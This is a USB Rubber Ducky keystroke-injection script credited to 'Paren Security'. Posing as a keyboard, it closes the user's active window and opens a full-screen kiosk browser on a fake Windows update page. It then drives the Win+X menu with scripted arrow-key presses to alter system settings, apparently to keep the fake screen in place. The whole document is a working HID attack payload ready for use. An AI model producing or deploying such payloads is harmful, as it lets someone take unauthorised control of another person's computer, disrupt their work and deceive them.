REM testpayload
REM author: Paren Security
REM edited by: Paren
REM  
REM let the ducky HID enumerate
DELAY 2000
ALT F4
GUI r
DELAY 500
STRING iexplore -k https://fakeupdate.net/win10ue/
ENTER
GUI x
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER
DELAY 1500
TAB
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
RIGHTARROW
DOWNARROW
ENTER
TAB
TAB
TAB
RIGHTARROW
TAB 
TAB 
TAB
ENTER 
ENTER